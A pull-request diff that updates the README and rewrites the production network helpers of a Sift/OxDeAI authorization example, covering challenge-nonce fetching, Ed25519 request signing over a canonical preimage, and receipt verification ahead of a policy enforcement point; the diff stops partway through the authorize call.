### PR TITLE
feat(example/sift): close production authorize→receipt→PEP execution …

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -28,3 +28,4 @@ audit.json
 *.pem
 *.der
 *.key
+.local/

--- a/examples/sift/README.md
+++ b/examples/sift/README.md
@@ -16,7 +16,7 @@ The example makes three architectural invariants concrete and observable:
 
 1. **Sift is the decision layer.**  A receipt is evidence that a Sift policy
    engine evaluated a requested action.  Receipt verification is a necessary
-   precondition for authorization — not execution authorization itself.
+   precondition for authorization - not execution authorization itself.
 
 2. **OxDeAI is the authorization and enforcement boundary.**  Execution requires
    a signed `AuthorizationV1` artifact.  The artifact is constructed locally
@@ -25,7 +25,7 @@ The example makes three architectural invariants concrete and observable:
 
 3. **The PEP is the execution gate.**  The Policy Enforcement Point checks
    audience, expiry, issuer signature, intent binding, state binding, and replay
-   before allowing any execution.  Replay protection lives here — not in the
+   before allowing any execution.  Replay protection lives here - not in the
    adapter.
 
 ---
@@ -70,9 +70,9 @@ signatures computed locally match what the Sift service produces.
 
 | Surface | Format |
 |---|---|
-| Canonical JSON | Python `json.dumps(sort_keys=True, separators=(",",":"), ensure_ascii=True)` — keys sorted lexicographically, no whitespace, non-ASCII UTF-16 code units escaped as `\uXXXX` |
+| Canonical JSON | Python `json.dumps(sort_keys=True, separators=(",",":"), ensure_ascii=True)` - keys sorted lexicographically, no whitespace, non-ASCII UTF-16 code units escaped as `\uXXXX` |
 | Signatures | Ed25519 over canonical JSON UTF-8 bytes, encoded base64url without padding (RFC 4648 §5) |
-| Public keys | Raw 32-byte Ed25519 key material — matches the `x` field of a JWKS entry (RFC 8037 OKP) |
+| Public keys | Raw 32-byte Ed25519 key material - matches the `x` field of a JWKS entry (RFC 8037 OKP) |
 
 The `ensure_ascii=True` requirement means supplementary characters (U+10000+)
 are encoded as two `\uXXXX` escapes (one per UTF-16 surrogate), matching Python
@@ -80,50 +80,49 @@ behavior exactly.
 
 ---
 
-## Production smoke test (requires provisioning from Jason)
+## Production smoke test (requires provisioning from Sift)
 
 ```bash
 pnpm -C examples/sift start:prod
 ```
 
-Runs three scenarios against the real Sift **production** infrastructure.
+Runs one live ALLOW smoke path against the real Sift **production**
+infrastructure, then re-submits the resulting OxDeAI authorization locally to
+assert PEP replay enforcement.
 
 The prod path adds two steps compared to staging:
 
-1. **Challenge fetch** — POST `/api/v1/auth/challenge` → nonce
-2. **Request signing** — agent Ed25519 private key signs the canonical authorize body (covering the nonce, so each request is unique)
+1. **Challenge fetch** - POST `/api/v1/auth/challenge` -> nonce
+2. **Request signing** - agent Ed25519 private key signs the canonical authorize preimage with `params_hash` (covering the nonce, so each request is unique)
 
 Live surfaces contacted:
 
 ```
 POST https://sift.walkosystems.com/api/v1/auth/challenge
 POST https://sift.walkosystems.com/api/v1/authorize
-GET  <PROD_JWKS_URL>          ← required from Jason (see below)
-GET  https://sift.walkosystems.com/api/v1/krl
+GET  https://sift.walkosystems.com/api/v1/receipt/verify-key
 ```
 
-### Required before prod can run
+### Resolved by the final Sift contract
 
-The following values in `src/run-prod.ts` and `src/liveProd.ts` are marked
-`PLACEHOLDER_` and must be replaced before `start:prod` will pass its guard:
+| Value | Status |
+|---|---|
+| `tenantId` | `"oxdeai_designpartner"` - confirmed |
+| `agentId` | `"oxdeai-boundary-demo-01"` - confirmed |
+| `agentRole` | `"validation_agent"` - confirmed |
+| Endpoint URLs | `/api/v1/auth/challenge`, `/api/v1/authorize`, `/api/v1/receipt/verify-key` - confirmed |
+| Signing preimage fields | `request_id, tenant_id, agent_id, agent_role, action, tool, risk_tier, nonce, timestamp, params_hash` - confirmed |
+| Signing canonicalization | sorted keys, no whitespace, `ensure_ascii=FALSE` - confirmed |
+| Required header | `X-Sift-Tenant: <tenant_id>` - confirmed |
+| params not in preimage | only `params_hash = sha256_hex(sift_canonical(params))` is signed - confirmed |
 
-| Value | Where | Source |
-|---|---|---|
-| `PROD_JWKS_URL_PLACEHOLDER` | `liveProd.ts` | **From Jason** — prod JWKS endpoint URL |
-| `PLACEHOLDER_PROD_TENANT_ID` | `run-prod.ts` | **From Jason** |
-| `PLACEHOLDER_PROD_AGENT_ID` | `run-prod.ts` | **From Jason** |
-| `PLACEHOLDER_PROD_AUDIENCE` | `run-prod.ts` | **From Jason** (e.g. `"oxdeai-pep-prod"`) |
-| `PLACEHOLDER_PROD_AGENT_KID` | `run-prod.ts` | **From Jason** |
-| `PLACEHOLDER_PROD_POLICY_ALLOW` | `run-prod.ts` | **From Jason** — low-risk allow policy ID |
-| `PLACEHOLDER_PROD_POLICY_DENY` | `run-prod.ts` | **From Jason** — exfil block policy ID |
-| `PLACEHOLDER_PROD_POLICY_REPLAY` | `run-prod.ts` | **From Jason** — replay-window policy ID |
-| `agentRole` | `run-prod.ts` | **From Jason** — set if prod policy requires a role |
-| Private key PEM | `.local/keys/` | **From Jason** — Ed25519 PKCS8 PEM, never committed |
+### Required to execute prod
 
-The challenge request/response shape and the authorize request shape (extra
-fields `tenant_id`, `agent_id`, `nonce`, `request_sig`) are isolated in
-`src/liveProd.ts` under clearly marked sections.  If Jason's docs differ from
-current assumptions, only those sections need updating.
+The Sift production contract is known. To execute the smoke test, provide the
+local provisioned agent private key and public key material, then run the prod
+script. The private key is used for the custom Ed25519 request signature sent to
+Sift and for the local OxDeAI authorization signature used by this smoke test.
+The inbound Sift receipt is still verified locally before OxDeAI PEP execution.
 
 ### Setting the private key path
 
@@ -149,7 +148,7 @@ In production, public keys are not bundled with the code.  The runtime follows
 this path for each incoming receipt:
 
 1. Read `kid` from the receipt's implicit or explicit key identifier.
-2. Check the **KRL (Key Revocation List)** — if `kid` is revoked, reject
+2. Check the **KRL (Key Revocation List)** - if `kid` is revoked, reject
    immediately before any signature work.
 3. Look up the JWKS entry whose `kid` matches.  If not found, trigger a JWKS
    refresh (cache may be stale) and retry once.
@@ -178,7 +177,7 @@ The `alg: "EdDSA"` field is JWKS metadata.  The runtime artifact uses
 
 | Scenario | What it shows |
 |---|---|
-| **ALLOW** | Full happy path — every check passes, `executed: true` |
+| **ALLOW** | Full happy path - every check passes, `executed: true` |
 | **DENY**  | DENY receipt blocked at `verifyReceipt`; adapter and PEP never reached |
 | **REPLAY** | Reusing the same `auth_id` from Scenario 1; PEP replay store returns DENY |
 
@@ -205,7 +204,7 @@ Key material (JWKS x, base64url no-padding):
   sift key  kid=sift-demo-key-1    x=<base64url>
   issuer key kid=demo-issuer-key-1  x=<base64url>
 
-Scenario 1 — ALLOW
+Scenario 1 - ALLOW
   receipt verification: OK
   intent normalization: OK
   state normalization: OK
@@ -213,11 +212,11 @@ Scenario 1 — ALLOW
   pep decision: ALLOW
   executed: true
 
-Scenario 2 — DENY
+Scenario 2 - DENY
   receipt verification: DENY_DECISION
   executed: false
 
-Scenario 3 — REPLAY
+Scenario 3 - REPLAY
   authorization reused: auth_id=<uuid>
   pep decision: DENY
   reason: REPLAY
@@ -243,10 +242,10 @@ Calls the real Sift staging infrastructure and runs three scenarios:
 
 | Scenario | What is live | What is local |
 |---|---|---|
-| **1 — LIVE ALLOW** | POST `/api/v1/authorize`; JWKS/KRL fetch; Ed25519 verify | PEP enforcement (`pepVerify`) |
-| **2 — LIVE DENY** | POST `/api/v1/authorize`; JWKS/KRL fetch; Ed25519 verify | decision gate (non-ALLOW blocks before PEP) |
-| **3a — LIVE REPLAY** | POST `/api/v1/authorize` with REPLAY decision; verify | decision gate |
-| **3b — LOCAL REPLAY CHECK** | — | PEP in-memory replay store; ALLOW artifact from Scenario 1 |
+| **1 - LIVE ALLOW** | POST `/api/v1/authorize`; JWKS/KRL fetch; Ed25519 verify | PEP enforcement (`pepVerify`) |
+| **2 - LIVE DENY** | POST `/api/v1/authorize`; JWKS/KRL fetch; Ed25519 verify | decision gate (non-ALLOW blocks before PEP) |
+| **3a - LIVE REPLAY** | POST `/api/v1/authorize` with REPLAY decision; verify | decision gate |
+| **3b - LOCAL REPLAY CHECK** | - | PEP in-memory replay store; ALLOW artifact from Scenario 1 |
 
 Live surfaces contacted:
 
@@ -261,7 +260,7 @@ Expected output (when staging is reachable):
 ```
 OxDeAI Sift Live Staging Demo
 
-Scenario 1 — LIVE ALLOW
+Scenario 1 - LIVE ALLOW
   authorize call: OK
   local receipt verification: OK
   authorization conversion: OK
@@ -272,31 +271,31 @@ Scenario 1 — LIVE ALLOW
   pep decision: ALLOW
   executed: true
 
-Scenario 3b — LOCAL REPLAY CHECK (OxDeAI PEP)
-  (live ALLOW artifact reused — no additional network call)
+Scenario 3b - LOCAL REPLAY CHECK (OxDeAI PEP)
+  (live ALLOW artifact reused - no additional network call)
   authorization reused: auth_id=staging-<uuid>
   pep decision: DENY
   reason: REPLAY
   executed: false
 
-Scenario 2 — LIVE DENY
+Scenario 2 - LIVE DENY
   authorize call: OK
   local receipt verification: OK
   auth_id: staging-<uuid>
   issuer:  sift-staging.walkosystems.com
   policy:  data-exfil-block
   sift decision: DENY
-  pep boundary: not reached — non-ALLOW decision blocks before PEP
+  pep boundary: not reached - non-ALLOW decision blocks before PEP
   executed: false
 
-Scenario 3a — LIVE REPLAY (Sift-signed REPLAY decision)
+Scenario 3a - LIVE REPLAY (Sift-signed REPLAY decision)
   authorize call: OK
   local receipt verification: OK
   auth_id: staging-<uuid>
   issuer:  sift-staging.walkosystems.com
   policy:  replay-window-violation
   sift decision: REPLAY
-  pep boundary: not reached — non-ALLOW decision blocks before PEP
+  pep boundary: not reached - non-ALLOW decision blocks before PEP
   executed: false
 ```
 
@@ -313,12 +312,12 @@ dependency.
 ```
 examples/sift/
   src/
-    helpers.ts        — canonical JSON, Ed25519 helpers, mock receipt builder, PEP
-    run.ts            — three local scenarios (no network)
-    liveStaging.ts    — staging network I/O helpers
-    run-staging.ts    — three live staging scenarios
-    liveProd.ts       — prod network I/O helpers (challenge + request signing)
-    run-prod.ts       — prod smoke test (three scenarios; requires Jason's values)
+    helpers.ts        - canonical JSON, Ed25519 helpers, mock receipt builder, PEP
+    run.ts            - three local scenarios (no network)
+    liveStaging.ts    - staging network I/O helpers
+    run-staging.ts    - three live staging scenarios
+    liveProd.ts       - prod network I/O helpers (challenge + request signing)
+    run-prod.ts       - prod smoke test (live ALLOW plus local replay check)
   package.json
   tsconfig.json
   README.md
@@ -328,24 +327,24 @@ examples/sift/
 
 Self-contained implementations of:
 
-- **Canonical JSON** (`canonicalize` + `canonicalBytes` + `canonicalHash`) —
+- **Canonical JSON** (`canonicalize` + `canonicalBytes` + `canonicalHash`) -
   mirrors the Sift contract algorithm (`ensure_ascii=True`) so digests computed
   in the PEP match the digests stored in the authorization.
-- **base64url utilities** (`b64uEncode`, `b64uDecode`) — RFC 4648 §5 encoding;
+- **base64url utilities** (`b64uEncode`, `b64uDecode`) - RFC 4648 §5 encoding;
   `b64uDecode` normalizes standard base64 input so both formats decode to
   identical bytes.
-- **JWKS key utilities** (`decodeJwksX`) — decodes a JWKS `x` field value
+- **JWKS key utilities** (`decodeJwksX`) - decodes a JWKS `x` field value
   (base64url) to a raw 32-byte Ed25519 public key.
-- **Ed25519 utilities** (`makeKeyPair`, `signCanonical`, `verifyCanonical`) —
+- **Ed25519 utilities** (`makeKeyPair`, `signCanonical`, `verifyCanonical`) -
   key generation (exports raw key + JWKS x + PKCS8 PEM), signing, and
   verification against raw 32-byte keys.
-- **Mock receipt builder** (`buildMockReceipt`) — constructs a structurally
+- **Mock receipt builder** (`buildMockReceipt`) - constructs a structurally
   valid receipt with a correct `receipt_hash` preimage and a real Ed25519
   signature using base64url encoding.
-- **Authorization signer** (`signAuthorization`) — signs the `signingPayload`
+- **Authorization signer** (`signAuthorization`) - signs the `signingPayload`
   returned by `receiptToAuthorization` and fills `authorization.signature.sig`
   with a base64url-no-padding Ed25519 signature.
-- **PEP simulation** (`pepVerify`) — enforces all execution-boundary checks
+- **PEP simulation** (`pepVerify`) - enforces all execution-boundary checks
   including audience, expiry, Ed25519 signature (over Sift-canonical JSON),
   intent_hash, state_hash, and an in-memory replay store.  Takes
   `issuerPublicKeyRaw` (raw 32-byte key, JWKS `x` format).

--- a/examples/sift/src/liveProd.ts
+++ b/examples/sift/src/liveProd.ts
@@ -1,108 +1,74 @@
 // SPDX-License-Identifier: Apache-2.0
 /**
- * Live Sift production authorization helpers.
+ * Live Sift production network helpers.
  *
- * All network I/O lives here.  run-prod.ts imports these helpers and
- * handles user-facing output.
+ * Responsibility: all network I/O for the prod path, nothing else.
+ * run-prod.ts imports these and drives the adapter/PEP pipeline.
  *
- * The prod path adds two steps compared to staging:
- *   fetchProdChallenge()   — fetch a nonce from /api/v1/auth/challenge
- *   signAuthorizeRequest() — sign the request body with the agent's Ed25519 key
+ * Network path:
+ *   fetchProdChallenge()     — POST /api/v1/auth/challenge → nonce
+ *   buildProdAuthorizeRequest() — build + sign request body
+ *   callProdAuthorize()      — POST /api/v1/authorize with X-Sift-Tenant header
+ *   extractRawReceipt()      — unwrap Sift receipt from response JSON
+ *   fetchProdVerifyKey()     — GET /api/v1/receipt/verify-key → Ed25519 public key bytes
  *
- * What is LIVE (requires network):
- *   fetchProdChallenge()      → real HTTPS to Sift prod challenge endpoint
- *   callProdAuthorize()       → real HTTPS POST to Sift prod authorize
- *   verifyWithProdKeyStore()  → real JWKS/KRL fetch + Ed25519 verify
+ * Adapter and PEP enforcement live in run-prod.ts, not here.
  *
- * What remains LOCAL:
- *   pepVerify()               — OxDeAI PEP enforcement, in-memory replay
+ * ── Canonicalization note ──────────────────────────────────────────────────
  *
- * Trust model:
- *   Sift decides → OxDeAI enforces at the PEP boundary.
- *   A verified Sift artifact is NOT execution authorization.
- *   It must still pass pepVerify() before anything executes.
+ * Sift request signing:  sorted keys, no whitespace, ensure_ascii=FALSE
+ *   → siftRequestCanonicalBytes() below
  *
- * ── PLACEHOLDERS ──────────────────────────────────────────────────────────────
+ * OxDeAI artifact hashes: sorted keys, no whitespace, ensure_ascii=TRUE
+ *   → canonicalHash() / canonicalBytes() from helpers.ts (used in run-prod.ts)
  *
- * The following values must be provided by Jason before prod can run:
+ * ── Response parsing ───────────────────────────────────────────────────────
  *
- *   PROD_JWKS_URL           — prod JWKS endpoint URL (not yet confirmed)
- *   ProdConfig.tenantId     — prod tenant identifier
- *   ProdConfig.agentId      — agent identifier registered with Sift prod
- *   ProdConfig.agentRole    — agent role (confirm if required by prod policy)
- *   ProdConfig.audience     — prod PEP audience string
- *   ProdConfig.publicKeyKid — key id for the prod agent keypair
- *   Policy IDs              — smoke test policy IDs for prod
- *   Private key path        — SIFT_PROD_PRIVATE_KEY_PATH or explicit path
- *
- * Challenge request/response shape (fetchProdChallenge) is isolated in its own
- * section and must be updated if Jason provides different field names.
- *
- * Authorize request shape (buildProdAuthorizeUnsignedBody) is isolated similarly.
+ *   /api/v1/receipt/verify-key returns receipt verification keys;
+ *     verifySiftReceipt() selects keys[receipt.key_id].
+ *   /api/v1/authorize may return a wrapped receipt or the receipt at the top level;
+ *     verifySiftReceipt() performs the full shape and crypto validation.
  */
 
 import { readFileSync } from "node:fs";
-import { SiftHttpKeyStore } from "@oxdeai/sift";
-import type { AuthorizationV1Payload, OxDeAIIntent, NormalizedState } from "@oxdeai/sift";
-import { canonicalHash, signCanonical, verifyCanonical } from "./helpers.js";
+import {
+  createPublicKey,
+  sign as nodeCryptoSign,
+  verify as nodeCryptoVerify,
+  createHash,
+  randomUUID,
+} from "node:crypto";
+import type { SiftReceipt } from "@oxdeai/sift";
+import { b64uEncode, b64uDecode } from "./helpers.js";
 
 // ─── Prod endpoints ───────────────────────────────────────────────────────────
 
 export const PROD_BASE_URL       = "https://sift.walkosystems.com";
 export const PROD_CHALLENGE_URL  = `${PROD_BASE_URL}/api/v1/auth/challenge`;
 export const PROD_AUTHORIZE_URL  = `${PROD_BASE_URL}/api/v1/authorize`;
-export const PROD_KRL_URL        = `${PROD_BASE_URL}/api/v1/krl`;
-export const PROD_HEALTH_URL     = `${PROD_BASE_URL}/api/v1/health`;
 export const PROD_VERIFY_KEY_URL = `${PROD_BASE_URL}/api/v1/receipt/verify-key`;
-
-// PLACEHOLDER: Prod JWKS URL not yet confirmed by Jason.
-// Expected pattern (mirrors staging): https://sift.walkosystems.com/sift-jwks.json
-// Update PROD_CONFIG_DEFAULTS.jwksUrl when Jason provides the value.
-export const PROD_JWKS_URL_PLACEHOLDER = "PLACEHOLDER_PROD_JWKS_URL";
 
 // ─── Configuration ────────────────────────────────────────────────────────────
 
-/**
- * All prod-specific inputs in one struct.
- *
- * Fields marked PLACEHOLDER must be filled before prod can run.
- * URL overrides default to the known prod endpoints above.
- */
 export interface ProdConfig {
-  // PLACEHOLDER: provided by Jason
-  tenantId: string;
-  // PLACEHOLDER: provided by Jason
-  agentId: string;
-  // PLACEHOLDER: confirm with Jason whether prod policy requires this field
-  agentRole?: string;
-  // PLACEHOLDER: prod PEP audience string (e.g. "oxdeai-pep-prod"); confirm with Jason
-  audience: string;
-  // PLACEHOLDER: prod JWKS endpoint URL; confirm with Jason
-  jwksUrl: string;
-  // Agent Ed25519 private key (PEM, PKCS8).  Load via loadProdPrivateKey().
+  // Resolved by Sift contract
+  tenantId:  string;  // "oxdeai_designpartner"
+  agentId:   string;  // "oxdeai-boundary-demo-01"
+  agentRole: string;  // "validation_agent"
+  // Agent Ed25519 private key (PKCS8 PEM) — signs requests to Sift.
+  // Also used as OxDeAI issuer key in the smoke test (dual use for simplicity).
+  // Load via loadProdPrivateKey().
   privateKeyPem: string;
   // URL overrides (optional; default to PROD_* constants above)
   challengeUrl?: string;
   authorizeUrl?: string;
-  krlUrl?: string;
-  // Logging metadata only — not used in any cryptographic operation
-  // PLACEHOLDER: confirm kid value with Jason
-  publicKeyKid?: string;
-  // base64url-no-padding 32-byte Ed25519 public key x; for log confirmation only
+  verifyKeyUrl?: string;
+  // Logging only
   publicKeyX?: string;
 }
 
 // ─── Private key loader ───────────────────────────────────────────────────────
 
-/**
- * Reads the agent's Ed25519 private key (PKCS8 PEM) from disk.
- *
- * Fails closed: throws if the file is missing or does not begin with a PEM header.
- *
- * Suggested default: resolve(".local/keys/oxdeai-prod-agent-ed25519-private.pem")
- * from the project root.  Set SIFT_PROD_PRIVATE_KEY_PATH to override.
- * The private key file must never be committed.
- */
 export function loadProdPrivateKey(filePath: string): string {
   let pem: string;
   try {
@@ -114,204 +80,217 @@ export function loadProdPrivateKey(filePath: string): string {
     );
   }
   if (!pem.includes("-----BEGIN")) {
-    throw new Error(
-      `prod private key at "${filePath}" does not look like a PEM file`,
-    );
+    throw new Error(`prod private key at "${filePath}" does not look like a PEM file`);
   }
   return pem;
 }
 
-// ─── Result types ─────────────────────────────────────────────────────────────
+// ─── Sift request canonicalization ───────────────────────────────────────────
+//
+// Contract: sorted keys, no whitespace, ensure_ascii=FALSE.
+// Used only for computing params_hash and signing the authorize preimage.
+// Do NOT use for OxDeAI artifact hashes (use canonicalHash from helpers.ts).
 
-export type ProdAuthorizeResult =
-  | {
-      ok: true;
-      decision: string;
-      auth_id: string;
-      policy_id: string;
-      issuer: string;
-      signingKeyRaw: Uint8Array;
-      /**
-       * Populated only when decision === "ALLOW".
-       * Typed as AuthorizationV1Payload for direct use with pepVerify().
-       * null for DENY / REPLAY responses.
-       */
-      allowArtifact: AuthorizationV1Payload | null;
-    }
-  | { ok: false; error: string };
+function deepSortKeys(value: unknown): unknown {
+  if (value === null || typeof value !== "object") return value;
+  if (Array.isArray(value)) return (value as unknown[]).map(deepSortKeys);
+  const obj = value as Record<string, unknown>;
+  const result: Record<string, unknown> = {};
+  for (const k of Object.keys(obj).sort()) result[k] = deepSortKeys(obj[k]);
+  return result;
+}
+
+function siftRequestCanonicalBytes(value: unknown): Buffer {
+  return Buffer.from(JSON.stringify(deepSortKeys(value)), "utf8");
+}
+
+function siftRequestCanonicalHash(value: unknown): string {
+  return createHash("sha256").update(siftRequestCanonicalBytes(value)).digest("hex");
+}
 
 // ─── Challenge endpoint ───────────────────────────────────────────────────────
 //
-// PLACEHOLDER: Shape is isolated below.  Update if Jason provides different
-// field names for the challenge request or response.
+// Confirmed contract:
+//   Request  POST { tenant_id, agent_id }
+//   Response { tenant_id, agent_id, nonce, expires_at, proof_message_format,
+//              signed_fields, signature_algorithm }
+//   Nonce field name: exactly "nonce"
 
-interface ProdChallengeRequest {
-  tenant_id: string;
-  agent_id: string;
-}
-
-interface ProdChallengeResponse {
-  nonce: string;
-}
-
-/**
- * Fetches a one-time nonce from the Sift prod challenge endpoint.
- *
- * PLACEHOLDER: Challenge request and response shapes are assumptions based on
- * the endpoint contract.  Confirm with Jason before running prod.
- *
- * Fails closed on any network error, non-2xx response, or malformed body.
- */
 export async function fetchProdChallenge(
   config: ProdConfig,
-): Promise<{ ok: true; nonce: string } | { ok: false; error: string }> {
+): Promise<{ ok: true; nonce: string; rawShape?: Record<string, unknown> } | { ok: false; error: string }> {
   const url = config.challengeUrl ?? PROD_CHALLENGE_URL;
-
-  const body: ProdChallengeRequest = {
-    tenant_id: config.tenantId,
-    agent_id: config.agentId,
-  };
 
   let response: Response;
   try {
     response = await fetch(url, {
       method: "POST",
-      headers: { "Content-Type": "application/json" },
-      body: JSON.stringify(body),
+      headers: {
+        "Content-Type": "application/json",
+        "X-Sift-Tenant": config.tenantId,
+      },
+      body: JSON.stringify({ tenant_id: config.tenantId, agent_id: config.agentId }),
     });
   } catch (e) {
-    return {
-      ok: false,
-      error: `challenge network error: ${e instanceof Error ? e.message : String(e)}`,
-    };
+    return { ok: false, error: `challenge: network error: ${e instanceof Error ? e.message : String(e)}` };
   }
 
   if (!response.ok) {
     let detail = "";
     try {
-      const rb = (await response.json()) as Record<string, unknown>;
-      detail = typeof rb["message"] === "string" ? `: ${rb["message"]}` : "";
+      const b = (await response.json()) as Record<string, unknown>;
+      if (typeof b["message"] === "string") detail = `: ${b["message"]}`;
     } catch { /* ignore */ }
-    return { ok: false, error: `HTTP ${response.status} from challenge endpoint${detail}` };
+    return { ok: false, error: `challenge: HTTP ${response.status}${detail}` };
   }
 
   let raw: unknown;
-  try {
-    raw = (await response.json()) as unknown;
-  } catch {
-    return { ok: false, error: "could not parse challenge response as JSON" };
-  }
+  try { raw = await response.json() as unknown; }
+  catch { return { ok: false, error: "challenge: response is not valid JSON" }; }
 
-  // PLACEHOLDER: Response shape assumed to be { nonce: string }.
-  // Update the field path below if Jason provides a different shape
-  // (e.g. { data: { nonce: string } } or { challenge: string }).
-  const parsed = parseChallengeResponse(raw);
-  if ("error" in parsed) {
-    return { ok: false, error: `malformed challenge response: ${parsed.error}` };
-  }
-  return { ok: true, nonce: parsed.nonce };
-}
-
-function parseChallengeResponse(
-  raw: unknown,
-): ProdChallengeResponse | { error: string } {
   if (typeof raw !== "object" || raw === null) {
-    return { error: "challenge response is not a JSON object" };
+    return { ok: false, error: "challenge: response is not a JSON object" };
   }
   const r = raw as Record<string, unknown>;
   if (typeof r["nonce"] !== "string" || r["nonce"].length === 0) {
-    return { error: "missing or empty field: nonce" };
+    return { ok: false, error: "challenge: response missing field: nonce" };
   }
-  return { nonce: r["nonce"] as string };
+  return { ok: true, nonce: r["nonce"] as string, rawShape: r };
 }
 
-// ─── Authorize request shape ──────────────────────────────────────────────────
+// ─── Authorize request ────────────────────────────────────────────────────────
 //
-// PLACEHOLDER: Field names and required set for the prod authorize request are
-// assumptions.  Confirm with Jason before running prod.  Only buildProdAuthorizeUnsignedBody
-// and signAuthorizeRequest need to change if the shape differs.
+// Confirmed body schema (Sift contract):
+//   request_id, tenant_id, agent_id, agent_role, action, tool,
+//   risk_tier, params, timestamp, nonce, signature
+//
+// Required header: X-Sift-Tenant: <tenant_id>
+//
+// Signing preimage (sift canonical JSON, ensure_ascii=false):
+//   { request_id, tenant_id, agent_id, agent_role, action, tool,
+//     risk_tier, nonce, timestamp, params_hash }
+//   params_hash = sha256_hex(sift_canonical(params))
+//   params itself is NOT in the preimage.
 
-interface ProdAuthorizeUnsignedBody {
-  // Staging-identical fields
-  audience: string;
-  decision: string;
-  policy_id: string;
-  intent: OxDeAIIntent;
-  intent_hash: string;
-  state: NormalizedState;
-  state_hash: string;
-  // PLACEHOLDER: Prod-specific fields (assumed; confirm with Jason)
-  tenant_id: string;
-  agent_id: string;
-  nonce: string;
-  agent_role?: string;
+export interface ProdSigningPreimage {
+  request_id:  string;
+  tenant_id:   string;
+  agent_id:    string;
+  agent_role:  string;
+  action:      string;
+  tool:        string;
+  risk_tier:   number;
+  nonce:       string;
+  timestamp:   number;
+  params_hash: string;
 }
 
-export interface ProdAuthorizeSignedBody extends ProdAuthorizeUnsignedBody {
-  // Ed25519 over Sift-canonical(body-minus-request_sig), base64url-no-padding
-  request_sig: string;
-}
-
-/**
- * Constructs the authorize request body WITHOUT the agent signature.
- *
- * PLACEHOLDER: Prod-specific fields (tenant_id, agent_id, nonce, agent_role)
- * are present based on expected contract.  Confirm shape with Jason.
- */
-export function buildProdAuthorizeUnsignedBody(
-  intent: OxDeAIIntent,
-  state: NormalizedState,
-  decision: string,
-  policyId: string,
-  nonce: string,
-  config: ProdConfig,
-): ProdAuthorizeUnsignedBody {
-  const body: ProdAuthorizeUnsignedBody = {
-    audience: config.audience,
-    decision,
-    policy_id: policyId,
-    intent,
-    intent_hash: canonicalHash(intent),
-    state,
-    state_hash: canonicalHash(state),
-    tenant_id: config.tenantId,
-    agent_id: config.agentId,
-    nonce,
-  };
-  if (config.agentRole !== undefined) {
-    body.agent_role = config.agentRole;
-  }
-  return body;
+export interface ProdAuthorizeRequest {
+  request_id: string;
+  tenant_id:  string;
+  agent_id:   string;
+  agent_role: string;
+  action:     string;
+  tool:       string;
+  risk_tier:  number;
+  params:     Record<string, unknown>;
+  timestamp:  number;
+  nonce:      string;
+  signature:  string;
 }
 
 /**
- * Signs the authorize request body with the agent's Ed25519 private key.
- *
- * Preimage: Sift-canonical JSON of the unsigned body (all fields except
- * request_sig).  The signature covers the nonce so each signed request is
- * unique.
- *
- * Returns a new object that includes all original fields plus request_sig.
- *
- * PLACEHOLDER: Confirm the preimage convention with Jason.  If the expected
- * preimage differs (e.g. a subset of fields), update this function only.
+ * Signs the preimage using the agent's Ed25519 private key.
+ * Canonicalization: sorted keys, no whitespace, ensure_ascii=FALSE.
+ * Returns base64url-no-padding signature.
  */
 export function signAuthorizeRequest(
-  unsignedBody: ProdAuthorizeUnsignedBody,
+  preimage: ProdSigningPreimage,
   privateKeyPem: string,
-): ProdAuthorizeSignedBody {
-  const request_sig = signCanonical(unsignedBody, privateKeyPem);
-  return { ...unsignedBody, request_sig };
+): string {
+  const bytes = siftRequestCanonicalBytes(preimage);
+  const sig = nodeCryptoSign(null, bytes, privateKeyPem);
+  return b64uEncode(sig);
 }
 
-// ─── Network call ─────────────────────────────────────────────────────────────
+/**
+ * Builds the full signed authorize request body.
+ * Generates a fresh UUID request_id and current unix timestamp.
+ */
+export function buildProdAuthorizeRequest(
+  action: string,
+  tool: string,
+  riskTier: number,
+  params: Record<string, unknown>,
+  nonce: string,
+  config: ProdConfig,
+): ProdAuthorizeRequest {
+  const request_id  = randomUUID();
+  const timestamp   = Math.floor(Date.now() / 1000);
+  const params_hash = siftRequestCanonicalHash(params);
+
+  const preimage: ProdSigningPreimage = {
+    request_id, tenant_id: config.tenantId, agent_id: config.agentId,
+    agent_role: config.agentRole, action, tool, risk_tier: riskTier,
+    nonce, timestamp, params_hash,
+  };
+
+  const signature = signAuthorizeRequest(preimage, config.privateKeyPem);
+
+  return {
+    request_id, tenant_id: config.tenantId, agent_id: config.agentId,
+    agent_role: config.agentRole, action, tool, risk_tier: riskTier,
+    params, timestamp, nonce, signature,
+  };
+}
 
 /**
- * POSTs the signed authorize request to the Sift prod endpoint.
- * Returns the raw parsed JSON on success; does not validate shape.
+ * Same as buildProdAuthorizeRequest but also returns the intermediate values
+ * needed to diagnose signing mismatches.  Used only when SIFT_PROD_DEBUG=1.
+ * Never exposes the private key.
  */
+export interface ProdAuthorizeRequestDebug {
+  request:      ProdAuthorizeRequest;
+  preimage:     ProdSigningPreimage;
+  paramsHash:   string;
+  canonicalJson: string;
+  signature:    string;
+}
+
+export function buildProdAuthorizeRequestDebug(
+  action: string,
+  tool: string,
+  riskTier: number,
+  params: Record<string, unknown>,
+  nonce: string,
+  config: ProdConfig,
+): ProdAuthorizeRequestDebug {
+  const request_id  = randomUUID();
+  const timestamp   = Math.floor(Date.now() / 1000);
+  const paramsHash  = siftRequestCanonicalHash(params);
+
+  const preimage: ProdSigningPreimage = {
+    request_id, tenant_id: config.tenantId, agent_id: config.agentId,
+    agent_role: config.agentRole, action, tool, risk_tier: riskTier,
+    nonce, timestamp, params_hash: paramsHash,
+  };
+
+  const canonicalJson = JSON.stringify(deepSortKeys(preimage));
+  const signature     = signAuthorizeRequest(preimage, config.privateKeyPem);
+
+  const request: ProdAuthorizeRequest = {
+    request_id, tenant_id: config.tenantId, agent_id: config.agentId,
+    agent_role: config.agentRole, action, tool, risk_tier: riskTier,
+    params, timestamp, nonce, signature,
+  };
+
+  return { request, preimage, paramsHash, canonicalJson, signature };
+}
+
+// ─── Network call to /api/v1/authorize ────────────────────────────────────────
+
 export async function callProdAuthorize(
-  signedBody: ProdAuthorizeSignedBody,
+  request: ProdAuthorizeRequest,
   config: ProdConfig,
 ): Promise<{ ok: true; raw: unknown } | { ok: false; error: string }> {
   const url = config.authorizeUrl ?? PROD_AUTHORIZE_URL;
@@ -320,268 +299,291 @@ export async function callProdAuthorize(
   try {
     response = await fetch(url, {
       method: "POST",
-      headers: { "Content-Type": "application/json" },
-      body: JSON.stringify(signedBody),
+      headers: {
+        "Content-Type": "application/json",
+        "X-Sift-Tenant": config.tenantId,
+      },
+      body: JSON.stringify(request),
     });
   } catch (e) {
